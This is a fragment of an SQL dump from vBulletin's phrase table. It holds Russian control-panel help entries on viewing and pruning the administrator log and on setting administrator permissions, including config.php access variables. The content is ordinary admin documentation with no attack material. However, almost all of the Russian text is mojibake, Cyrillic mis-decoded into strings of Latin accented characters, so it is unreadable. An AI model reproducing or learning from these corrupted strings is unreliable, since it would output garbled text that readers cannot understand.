(21749, -1, 'adminlog_choose_text', 'cphelptext', 'Èñïîëüçóÿ ýòó ñòðà Ãèöó âû ìîæåòå ïðîñìà òðèâà òü è, åñëè ó âà ñ åñòü Ãà ýòî ïðà âà , óäà ëÿòü çà ïèñè äåéñòâèé à äìèÃèñòðà òîðîâ. \r\nÃðè ïðîñìîòðå, âû ìîæåòå âûáðà òü 4 îïöèè ïîèñêà Ãåîáõîäèìûõ çà ïèñåé. ÃŽÃè ïåðå÷èñëåÃû è îïèñà Ãû Ãèæå. \r\nÃîñëå òîãî, êà ê êðèòåðèè ïîèñêà óêà çà Ãû, Ãà æìèòå êÃîïêó \"Ãîñìîòðåòü\". \r\nÅñëè âû õîòèòå óäà ëèòü çà ïèñè, âûáåðèòå êðèòåðèè îòáîðà óäà ëÿåìûõ çà ïèñåé. ÃŽÃè òà êæå îïèñà Ãû Ãèæå. \r\nÈìåéòå ââèäó, ÷òî ðåçóëüòà ò ïîèñêà áóäåò óäîâëåòâîðÿòü âñåì óêà çà ÃÃûì ïà ðà ìåòðà ì. Ã’.Ã¥. åñëè âû óêà æåòå \"ÀäìèÃèñòðà òîð\" â îïöèè ¹2 è ââåäåòå \"40\" â îïöèè ¹3, áóäóò óäà ëåÃû çà ïèñè âñåõ äåéñòâèé, ïðîèçâåäåÃÃûõ ÀäìèÃèñòðà òîðîì 40 è áîëåå äÃåé Ãà çà ä.', 'vbulletin', '', 0, ''),
(21750, -1, 'adminlog_choose_title', 'cphelptext', 'Âûáîð îïöèé ïðîñìîòðà çà ïèñåé äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(21751, -1, 'adminlog_choose_enddate_text', 'cphelptext', 'Âû ìîæåòå îòôèëüòðîâà òü çà ïèñè, âûáðà â çà îïðåäåë¸ÃÃûé ïåðèîä. Çäåñü âû ìîæåòå óêà çà òü êîÃå÷Ãóþ äà òó äëÿ ýòîãî ïåðèîäà .', 'vbulletin', 'zCarot', 1220959288, '3.8.0 Alpha 1'),
(21752, -1, 'adminlog_choose_enddate_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', 'zCarot', 1220959288, '3.8.0 Alpha 1'),
(21753, -1, 'adminlog_choose_startdate_text', 'cphelptext', 'Âû ìîæåòå îòôèëüòðîâà òü çà ïèñè, âûáðà â çà îïðåäåë¸ÃÃûé ïåðèîä. Çäåñü âû ìîæåòå óêà çà òü Ãà ÷à ëüÃóþ äà òó äëÿ ýòîãî ïåðèîäà .', 'vbulletin', 'zCarot', 1220959263, '3.8.0 Alpha 1'),
(21754, -1, 'adminlog_choose_startdate_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', 'zCarot', 1220959263, '3.8.0 Alpha 1'),
(21755, -1, 'adminlog_choose_perpage_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî çà ïèñåé, îòîáðà æà åìîå Ãà ñòðà Ãèöó. Åñëè ó âà ñ ìåäëåÃÃîå ñîåäèÃÃ¥Ãèå, ðåêîìåÃäóåòñÿ óñòà Ãà âëèâà òü Ãåáîëüøîå çÃà ÷åÃèå.', 'vbulletin', '', 0, ''),
(21756, -1, 'adminlog_choose_perpage_title', 'cphelptext', 'Ãðîñìîòð: Çà ïèñåé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(21757, -1, 'adminlog_choose_script_text', 'cphelptext', 'Îòîáðà æåÃèå çà ïèñåé äåéñòâèé, ñîâåðøåÃÃûõ ñ èñïîëüçîâà Ãèåì îïðåäåëåÃÃîãî ñêðèïòà (Ãà ïðèìåð, announcement.php èëè forum.php).', 'vbulletin', '', 0, ''),
(21758, -1, 'adminlog_choose_script_title', 'cphelptext', 'Ãîêà çà òü çà ïèñè, îòÃîñÿùèåñÿ ê ñêðèïòó', 'vbulletin', '', 0, ''),
(21759, -1, 'adminlog_choose_userid_text', 'cphelptext', 'Åñëè âû æåëà åòå ïðîñìîòðåòü çà ïèñè äåéñòâèé, ïðîèçâåäåÃÃûõ òîëüêî îïðåäåëåÃÃûì à äìèÃèñòðà òîðîì, óêà æèòå çäåñü åãî èìÿ.', 'vbulletin', '', 0, ''),
(21760, -1, 'adminlog_choose_userid_title', 'cphelptext', 'Ãðîñìîòð çà ïèñåé äåéñòâèé, ñîâåðøåÃÃûõ', 'vbulletin', '', 0, ''),
(21761, -1, 'adminlog_choose_orderby_text', 'cphelptext', 'ÌîæÃî ñîðòèðîâà òü çà ïèñè ïî äà òå ñîâåðøåÃèÿ äåéñòâèÿ, èñïîëüçîâà ÃÃîìó ñêðèïòó, èëè ïî èìåÃè ïîëüçîâà òåëÿ, ñîâåðøèâøåãî äåéñòâèå.', 'vbulletin', '', 0, ''),
(21762, -1, 'adminlog_choose_orderby_title', 'cphelptext', 'Ãðîñìîòð: ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''),
(21763, -1, 'adminlog_choose_pscript_text', 'cphelptext', 'ÌîæÃî óäà ëÿòü çà ïèñè äåéñòâèé, ñîâåðøåÃÃûõ ñ èñïîëüçîâà Ãèåì îïðåäåëåÃÃîãî ñêðèïòà (Ãà ïðèìåð, forum.php èëè template.php).', 'vbulletin', '', 0, ''),
(21764, -1, 'adminlog_choose_pscript_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñåé, îòÃîñÿùèõñÿ ê ñêðèïòó', 'vbulletin', '', 0, ''),
(21765, -1, 'adminlog_choose_puserid_text', 'cphelptext', 'Îïöèÿ ïîçâîëÿåò óäà ëÿòü çà ïèñè äåéñòâèé, ñîâåðøåÃÃûõ îïðåäåëåÃÃûì à äìèÃèñòðà òîðîì.', 'vbulletin', '', 0, ''),
(21766, -1, 'adminlog_choose_puserid_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñåé äåéñòâèé, ñîâåðøåÃÃûõ', 'vbulletin', '', 0, ''),
(21767, -1, 'adminlog_choose_daysprune_text', 'cphelptext', 'Âû ìîæåòå óäà ëÿòü ñòà ðûå çà ïèñè, èñïîëüçóÿ ýòó îïöèþ. Çà ïèñè ðà Ãåå óêà çà ÃÃîé äà òû áóäóò óäà ëåÃû.', 'vbulletin', '', 0, ''),
(21768, -1, 'adminlog_choose_daysprune_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñåé ñòà ðøå, ÷åì X äÃåé', 'vbulletin', '', 0, ''),
(21769, -1, 'adminlog_prunelog_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ óêà çà ÃÃûõ çà ïèñåé äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(21770, -1, 'adminlog_prunelog_title', 'cphelptext', 'Óäà ëåÃèå çà ïèñåé äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ', 'vbulletin', '', 0, ''),
(21771, -1, 'adminlog_resolveip_text', 'cphelptext', 'Åñòü Ãåñêîëüêî ïðè÷èÃ, ïî êîòîðûì ìîæåò îêà çà òüñÿ ÃåâîçìîæÃûì îïðåäåëèòü õîñò ìà øèÃû ïî IP à äðåñó. Ãòî ìîæåò áûòü ñâÿçà Ãî ñ Ãåðà áîòîñïîñîáÃîñòüþ ñåðâåðà , ÃåäîñòóïÃîñòüþ îáðà òÃîãî îïðåäåëåÃèÿ DNS, èëè ïðåâûøåÃèåì òà éìà óòà âà øåãî ñåðâåðà âî âðåìÿ îæèäà Ãèÿ îòâåòà .', 'vbulletin', '', 0, ''),
(21772, -1, 'adminlog_resolveip_title', 'cphelptext', 'Ãðè÷èÃû ÃåâîçìîæÃîñòè îïðåäåëåÃèÿ õîñòà ïî IP à äðåñó', 'vbulletin', '', 0, ''),
(21773, -1, 'adminlog_restrict_text', 'cphelptext', 'Âû ìîæåòå îãðà Ãè÷èòü äîñòóï ê çà ïèñÿì à äìèÃèñòðèðîâà Ãèÿ èçìåÃÿÿ çÃà ÷åÃèÿ äâóõ ïåðåìåÃÃûõ â ôà éëå config.php. \r\n\r\nÄîñòóï ê çà ïèñÿì à äìèÃèñòðèðîâà Ãèÿ ÃÃ¥ óïðà âëÿåòñÿ ÷åðåç ïà Ãåëü à äìèÃèñòðà òîðà ïî ñîîáðà æåÃèÿì áåçîïà ñÃîñòè. \r\nÎà êîÃòðîëèðóåòñÿ äâóìÿ ïåðåìåÃÃûìè, Ãà õîäÿùèìèñÿ â ôà éëå includes/config.php file. \r\n\r\n îáîèõ ïåðåìåÃÃûõ ìîãóò áûòü êà ê ÷èñëà , òà ê è ñïèñîê ÷èñåë, ðà çäåë¸ÃÃûõ çà ïÿòûìè, êà æäà ÿ èç êîòîðûõ îáîçÃà ÷à åò Ãîìåð (ID) ïîëüçîâà òåëÿ, èìåþùåãî äîñòóï ê çà ïèñÿì à äìèÃèñòðèðîâà Ãèÿ. \r\n\r\nÅñëè âû æåëà åòå èçìåÃèòü òåêóùèå ïðà âà äîñòóïà ê çà ïèñÿì à äìèÃèñòðèðîâà Ãèÿ, âà ì ñëåäóåò îòêðûòü ôà éë includes/config.php â òåêñòîâîì ðåäà êòîðå è èçìåÃèòü çÃà ÷åÃèÿ ñëåäóþùèõ ïåðåìåÃÃûõ \r\n\r\n $config[\'SpecialUsers\'][\'canviewadminlog\'] = \'1,10\';\r\n $config[\'SpecialUsers\'][\'canpruneadminlog\'] = \'1\'; \r\n\r\n äà ÃÃîì ñëó÷à å äîñòóï ê ïðîñìîòðó çà ïèñåé à äìèÃèñòðèðîâà Ãèÿ áóäåò ðà çðåø¸à òîëüêî âà ì (åñëè âà ø Ãîìåð (ID) ïîëüçîâà òåëÿ ðà âåà 1) è ó÷à ñòÃèêó ôîðóìà ñ Ãîìåðîì (ID) ïîëüçîâà òåëÿ, ðà âÃûì 10. Äîñòóï ê óäà ëåÃèþ çà ïèñåé ðà çðåø¸à òîëüêî âà ì (åñëè âà ø Ãîìåð (ID) ïîëüçîâà òåëÿ ðà âåà 1). \r\n\r\nÅñëè ïåðåìåÃÃà ÿ $config[\'SpecialUsers\'][\'canviewadminlog\'] â ôà éëå config.php óäà ëåÃà , èëè å¸ çÃà ÷åÃèå ÃÃ¥ îïðåäåëåÃî ($config[\'SpecialUsers\'][\'canviewadminlog\'] = \'\'; ), òî ÂÑÅ à äìèÃèñòðà òîðû áóäóò èìåòü äîñòóï ê ïðîñìîòðó çà ïèñåé à äìèÃèñòðèðîâà Ãèÿ. \r\nÃî, åñëè ïåðåìåÃÃà ÿ $config[\'SpecialUsers\'][\'canpruneadminlog\'] óäà ëåÃà , èëè å¸ çÃà ÷åÃèå ÃÃ¥ îïðåäåëåÃî, òî Ãèêòî ÃÃ¥ ñìîæåò óäà ëÿòü çà ïèñè à äìèÃèñòðèðîâà Ãèÿ. ', 'vbulletin', 'zCarot', 1207652855, '3.7.0 Release Candidate 3'),
(21774, -1, 'adminlog_restrict_title', 'cphelptext', 'Óïðà âëåÃèå äîñòóïîì ê çà ïèñÿì äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(21775, -1, 'adminlog_view_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà æà åò êîëè÷åñòâî âõîäîâ â ñèñòåìó âà ñ è âà øèõ ñî-à äìèÃîâ (åñëè åñòü). Ñëåâà Ãà ïðà âî êîëîÃêè ñ èÃôîðìà öèåé î: \r\nID : âÃóòðåÃÃèé ID çà ïèñè \r\nÈìÿ : èìÿ à äìèÃèñòðà òîðà , ñîâåðøèâøåãî äåéñòâèå \r\nÄà òà : äà òà ñîâåðøåÃèÿ äåéñòâèÿ \r\nÑêðèïò : èñïîëüçîâà ÃÃûé ñêðèïò. ÃîëüøèÃñòâî Ãà çâà Ãèé ñêðèïòîâ ãîâîðÿò ñà ìè çà ñåáÿ. Ãà ïðèìåð, ïðîñìîòð ýòèõ çà ïèñåé îáåñïå÷èâà åò ñêðèïò adminlog.php. \r\nÄåéñòâèå : ñîáñòâåÃÃî, ñîâåðøåÃÃîå äåéñòâèå. Ãòî ÃÃ¥ âñåãäà ïîÃÿòÃî, òà ê êà ê ýòî âÃóòðåÃÃåå Ãà çâà Ãèå äåéñòâèÿ, ïîýòîìó òðåáóåòñÿ êðà òêîå ñëîâåñÃîå îïèñà Ãèå. \r\nÈÃôîðìà öèÿ : äëÿ Ãåêîòîðûõ äåéñòâèé çà ïèñûâà þòñÿ äîïîëÃèòåëüÃà ÿ èÃôîðìà öèÿ (Ãà ïðèìåð, èçìåÃÃ¥Ãèå ID, èëè ðåäà êòèðîâà Ãèå øà áëîÃà ) \r\nIP à äðåñ : à äðåñ, ñ êîòîðîãî à äìèà ñîâåðøèë äåéñòâèå. Ãà æà òèå Ãà à äðåñ ïðèâåäåò ê ïîïûòêå îïðåäåëèòü Ãà çâà Ãèå êîÃêðåòÃîé ìà øèÃû è/èëè åå äîìåÃÃîå èìÿ ïî IP. ÎäÃà êî èÃîãäà ýòî ñäåëà òü ÃåâîçìîæÃî. Ñì. Ãðè÷èÃû ÃåâîçìîæÃîñòè îïðåäåëåÃèÿ õîñòà ïî IP à äðåñó . \r\nÅñëè âñå çà ïèñà ÃÃûå äåéñòâèÿ ÃÃ¥ óìåùà þòñÿ Ãà ñòðà Ãèöå, âÃèçó åå âû óâèäèòå ññûëêè Ãà ïåðâóþ, ïðåäûäóùóþ, ñëåäóþùóþ è ïîñëåäÃþþ ñòðà Ãèöó. Ãòè ññûëêè ïîÿâëÿþòñÿ ïî ìåðå Ãåîáõîäèìîñòè. Ãà ïðèìåð, êîãäà âû Ãà õîäèòåñü Ãà ïåðâîé ñòðà Ãèöå, òî ññûëêè Ãà ïåðâóþ è ïðåäûäóùóþ ñòðà Ãèöó ÃÃ¥ îòîáðà æà þòñÿ. \r\n×òîáû âåðÃóòüñÿ Ãà ãëà âÃóþ ñòðà Ãèöó, Ãà æìèòå \"Ãåðåçà ïóñê\" ââåðõó ñòðà Ãèöû. \r\nÂû ìîæåòå îãðà Ãè÷èòü äîñòóï ê äà ÃÃîìó ñêðèïòó âîîáùå èëè ðà çðåøèòü ïðîñìîòð áåç âîçìîæÃîñòè óäà ëåÃèÿ çà ïèñåé. Ñì. Îãðà Ãè÷åÃèå äîñòóïà ê çà ïèñÿì äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà .', 'vbulletin', 'zCarot', 1205940245, '3.7.0 Release Candidate 1'),
(21776, -1, 'adminlog_view_title', 'cphelptext', 'Ãðîñìîòð çà ïèñåé äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(21777, -1, 'adminpermissions_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃðóïïû ïîëüçîâà òåëåé \r\nÃðà âà â ðà çäåëà õ \r\nÃðà âà à äìèÃèñòðà òîðà \r\nÃðà âà à äìèÃèñòðà òîðà : \r\nÔîðóì äà åò âîçìîæÃîñòü îãðà Ãè÷èâà òü äîñòóï ðà çëè÷Ãûõ à äìèÃèñòðà òîðîâ ê ðà çëè÷Ãûì ôóÃêöèÿì ïà Ãåëè óïðà âëåÃèÿ. Âû ìîæåòå Ãà çÃà ÷à òü ñî-à äìèÃèñòðà òîðîâ, ïðåäîñòà âëÿÿ èì òå èëè èÃûå ïðà âà , ÃÃ¥ ïðåäîñòà âëÿÿ ïðè ýòîì ïîëÃîãî äîñòóïà ê óïðà âëåÃèþ ôîðóìîì. \r\nÂà ø ID äîëæåà áûòü îáîçÃà ÷åà â ôà éëå config.php, ÷òîáû âà ì áûë ïðåäîñòà âëåà ïîëÃûé äîñòóï ê ýòîé ñòðà Ãèöå. ÈÃñòðóêöèè îá ýòîì ñì. çäåñü .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21778, -1, 'adminpermissions_title', 'cphelptext', 'ÃŽ ïðà âà õ äîñòóïà à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(21779, -1, 'adminpermissions_edit_text', 'cphelptext', 'Èñïîëüçóÿ ýòó ñòðà Ãèöó, âû ìîæåòå ïðåäîñòà âèòü ðà çëè÷Ãûå ïðà âà êîÃêðåòÃîìó à äìèÃèñòðà òîðó. ÃîäðîáÃîå îïèñà Ãèå ñì. Ãèæå.', 'vbulletin', '', 0, ''),
(21780, -1, 'adminpermissions_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïðà â à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(21781, -1, 'adminpermissions_edit_canadminmodlog_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï Ãà ïðîñìîòð çà ïèñåé äåéñòâèé ìîäåðà òîðîâ ñ ïîìîùüþ ðà çäåëà \"Ñòà òèñòèêà è çà ïèñè\". \r\n \r\nÂîçìîæÃîñòü óäà ëåÃèÿ çà ïèñåé äåéñòâèé ìîäåðà òîðîâ îïðåäåëÿåòñÿ ïà ðà ìåòðîì \"ïîëüçîâà òåëè ñ ïðà âà ìè óäà ëåÃèÿ çà ïèñåé äåéñòâèé à äìèÃèñòðà òîðà \", Ãà õîäÿùèìñÿ â ôà éëå includes/config.php.', 'vbulletin', 'zCarot', 1207912655, '3.7.0 Release Candidate 4'),
(21782, -1, 'adminpermissions_edit_canadminmodlog_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü çà ïèñè äåéñòâèé ìîäåðà òîðîâ', 'vbulletin', 'zCarot', 1207912655, '3.7.0 Release Candidate 4'),
(21783, -1, 'adminpermissions_edit_dismissednews_text', 'cphelptext', 'Ñïèñîê Ãîìåðîâ (ID) Ãîâîñòåé, ðà çäåë¸ÃÃûõ çà ïÿòûìè, êîòîðûå áûëè ïðî÷èòà Ãû è ñêðûòû äà ÃÃûì à äìèÃèñòðà òîðîì. \r\n \r\n×òîáû âåðÃóòü âñå Ãîâîñòè, ïðîñòî î÷èñòèòå äà ÃÃîå ïîëå.', 'vbulletin', 'zCarot', 1158158318, '3.6.1'),
(21784, -1, 'adminpermissions_edit_dismissednews_title', 'cphelptext', 'Ñêðûòûå Ãîâîñòè ñ vBulletin.com', 'vbulletin', 'zCarot', 1158158296, '3.6.1'),
(21785, -1, 'adminpermissions_edit_canadminsettings_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê ðà çäåëó \"ÎñÃîâÃûå Ãà ñòðîéêè\" ïà Ãåëè óïðà âëåÃèÿ.', 'vbulletin', '', 0, ''),
(21786, -1, 'adminpermissions_edit_canadminsettings_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü Ãà ñòðîéêà ìè', 'vbulletin', '', 0, ''),
(21787, -1, 'adminpermissions_edit_canadminstyles_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ñòèëÿìè.', 'vbulletin', '', 0, ''),
(21788, -1, 'adminpermissions_edit_canadminstyles_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ñòèëè', 'vbulletin', '', 0, ''),
(21789, -1, 'adminpermissions_edit_canadminlanguages_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ÿçûêà ìè è ôðà çà ìè.', 'vbulletin', '', 0, ''),
(21790, -1, 'adminpermissions_edit_canadminlanguages_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ÿçûêè', 'vbulletin', '', 0, ''),
(21791, -1, 'adminpermissions_edit_canadminforums_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ðà çäåëà ìè è èõ ìîäåðà òîðà ìè.', 'vbulletin', '', 0, ''),
(21792, -1, 'adminpermissions_edit_canadminforums_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ðà çäåëû', 'vbulletin', '', 0, ''),
(21793, -1, 'adminpermissions_edit_canadminthreads_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ òåìà ìè è ñîîáùåÃèÿìè.', 'vbulletin', '', 0, ''),
(21794, -1, 'adminpermissions_edit_canadminthreads_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü òåìû', 'vbulletin', '', 0, ''),
(21795, -1, 'adminpermissions_edit_canadmincalendars_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ êà ëåÃäà ðÿìè è èõ ìîäåðà òîðà ìè.', 'vbulletin', '', 0, ''),
(21796, -1, 'adminpermissions_edit_canadmincalendars_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü êà ëåÃäà ðè', 'vbulletin', '', 0, ''),
(21797, -1, 'adminpermissions_edit_canadminusers_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ïîëüçîâà òåëÿìè, ãðóïïà ìè ïîëüçîâà òåëåé, Ãà ðóøåÃèÿìè, ñòà òóñà ìè, çâà Ãèÿìè, ðåïóòà öèåé è ïðîôèëÿìè ïîëüçîâà òåëåé, à òà êæå êîììåð÷åñêèìè ïîäïèñêà ìè.', 'vbulletin', 'zCarot', 1231681195, '3.8.0'),
(21798, -1, 'adminpermissions_edit_canadminusers_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(21799, -1, 'adminpermissions_edit_canadminfaq_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ñïðà âêîé', 'vbulletin', '', 0, ''),
(21800, -1, 'adminpermissions_edit_canadminfaq_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ñïðà âêó', 'vbulletin', '', 0, ''),
(21801, -1, 'adminpermissions_edit_canadminpermissions_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê èçìåÃÃ¥Ãèþ ïðà â ãðóïï ïîëüçîâà òåëåé, ïðà â â ðà çäåëà õ, à òà êæå óïðà âëåÃèþ ìà ñêà ìè äîñòóïà .', 'vbulletin', '', 0, ''),
(21802, -1, 'adminpermissions_edit_canadminpermissions_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ïðà âà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(21803, -1, 'adminpermissions_edit_canadminimages_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ à âà òà ðà ìè, èêîÃêà ìè ñîîáùåÃèé è ñìà éëà ìè.', 'vbulletin', '', 0, ''),
(21804, -1, 'adminpermissions_edit_canadminimages_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü à âà òà ðû/èêîÃêè ñîîáùåÃèé/ñìà éëû', 'vbulletin', '', 0, ''),
(21805, -1, 'adminpermissions_edit_canadminbbcodes_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ äîïîëÃèòåëüÃûìè BB êîäà ìè.', 'vbulletin', 'zCarot', 1206965772, '3.7.0 Release Candidate 2'),
(21806, -1, 'adminpermissions_edit_canadminbbcodes_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü BB êîäû', 'vbulletin', '', 0, ''),
(21807, -1, 'adminpermissions_edit_canadmincron_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ çà ïëà Ãèðîâà ÃÃûìè çà äà ÷à ìè.', 'vbulletin', '', 0, ''),
(21808, -1, 'adminpermissions_edit_canadmincron_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü çà ïëà Ãèðîâà ÃÃûå çà äà ÷è', 'vbulletin', '', 0, ''),
(21809, -1, 'adminpermissions_edit_canadminmaintain_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê èÃñòðóìåÃòà ì îáñëóæèâà Ãèÿ. \r\n \r\nÅñëè âû æåëà åòå ðà çðåøèòü èñïîëüçîâà Ãèå ýòîãî, òî ó÷èòûâà éòå, ÷òî ýòî äà ¸ò ïîòåÃöèà ëüÃóþ âîçìîæÃîñòü âûïîëÃÃ¥Ãèÿ ëþáîãî php ôà éëà Ãà âà øåì ñåðâåðå, ïîýòîìó ñëåäóåò îáäóìà òü åù¸ ðà ç, äîâåðÿåòå ëè âû à äìèÃèñòðà òîðó äîñòà òî÷Ãî, ÷òîáû ðà çðåøèòü åìó èñïîëüçîâà òü äà ÃÃûå ôóÃêöèè.', 'vbulletin', 'zCarot', 1194863484, '3.7.0 Beta 1'),
(21810, -1, 'adminpermissions_edit_canadminmaintain_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü èÃñòðóìåÃòû îáñëóæèâà Ãèÿ', 'vbulletin', '', 0, ''),
(21811, -1, 'adminpermissions_edit_canadminplugins_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê óïðà âëåÃèþ ìîäóëÿìè, èñïîëüçóåìûìè Ãà ôîðóìå. \r\n \r\nÅñëè âû æåëà åòå ðà çðåøèòü èñïîëüçîâà Ãèå ýòîãî, òî ó÷èòûâà éòå, ÷òî ýòî äà ¸ò âîçìîæÃîñòü âûïîëÃÃ¥Ãèÿ ëþáîãî php êîäà , ïîýòîìó ñëåäóåò îáäóìà òü åù¸ ðà ç, äîâåðÿåòå ëè âû à äìèÃèñòðà òîðó äîñòà òî÷Ãî, ÷òîáû ðà çðåøèòü åìó èñïîëüçîâà òü äà ÃÃûå ôóÃêöèè.', 'vbulletin', 'zCarot', 1194863445, '3.7.0 Beta 1'),
(21812, -1, 'adminpermissions_edit_canadminplugins_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü ìîäóëè', 'vbulletin', '', 0, ''),
(21813, -1, 'adminpermissions_edit_canadminnotices_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ó à äìèÃèñòðà òîðà äîñòóï ê ðà çäåëó \"Âà æÃà ÿ èÃôîðìà öèÿ\" ïà Ãåëè à äìèÃèñòðà òîðà .', 'vbulletin', 'zCarot', 1207912417, '3.7.0 Release Candidate 4'),
(21814, -1, 'adminpermissions_edit_canadminnotices_title', 'cphelptext', 'Ìîæåò à äìèÃèñòðèðîâà òü âà æÃóþ èÃôîðìà öèþ', 'vbulletin', 'zCarot', 1207912417, '3.7.0 Release Candidate 4'),
(21815, -1, 'adminpermissions_edit_cssprefs_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü ñòèëü ïà Ãåëè à äìèÃèñòðà òîðà . Ó÷òèòå, ÷òî äà ÃÃûé ñòèëü áóäåò èñïîëüçîâà òüñÿ ïî óìîë÷à Ãèþ - à äìèÃèñòðà òîðû ñìîãóò â ëþáîå âðåìÿ âûáðà òü ñåáå äðóãîé ñòèëü.', 'vbulletin', '', 0, ''),
(21816, -1, 'adminpermissions_edit_cssprefs_title', 'cphelptext', 'Âûáðà ÃÃûé ñòèëü ïà Ãåëè', 'vbulletin', '', 0, ''),
(21817, -1, 'adminpermissions_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå îòîáðà æåÃû âñå à äìèÃèñòðà òîðû âà øåãî ôîðóìà . (ÀäìèÃèñòðà òîð - ýòî ïîëüçîâà òåëü, âõîäÿùèé â ãðóïïó, äëÿ êîòîðîé óñòà ÃîâëåÃà îïöèÿ \"Èìååò äîñòóï ê ïà Ãåëè óïðà âëåÃèÿ (ÀäìèÃèñòðà òîð)\".)) \r\nÃÿäîì ñ èìåÃåì à äìèÃèñòðà òîðà åñòü ññûëêà , ñ ïîìîùüþ êîòîðîé ìîæÃî ïðîñìîòðåòü çà ïèñè äåéñòâèé äà ÃÃîãî à äìèÃèñòðà òîðà (\"Ñìîòðåòü çà ïèñè äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ\"), à òà êæå ññûëêà , ïîçâîëÿþùà ÿ îòðåäà êòèðîâà òü ïðà âà äà ÃÃîãî à äìèÃèñòðà òîðà \"Ãåäà êòèðîâà òü ïðà âà \". Äëÿ ðåäà êòèðîâà Ãèÿ ïðîôèëÿ à äìèÃèñòðà òîðà , Ãà æìèòå Ãà åãî èìÿ.', 'vbulletin', '', 0, ''),
(21818, -1, 'adminpermissions_modify_title', 'cphelptext', 'Óïðà âëåÃèå ïðà âà ìè à äìèÃà ', 'vbulletin', '', 0, ''),
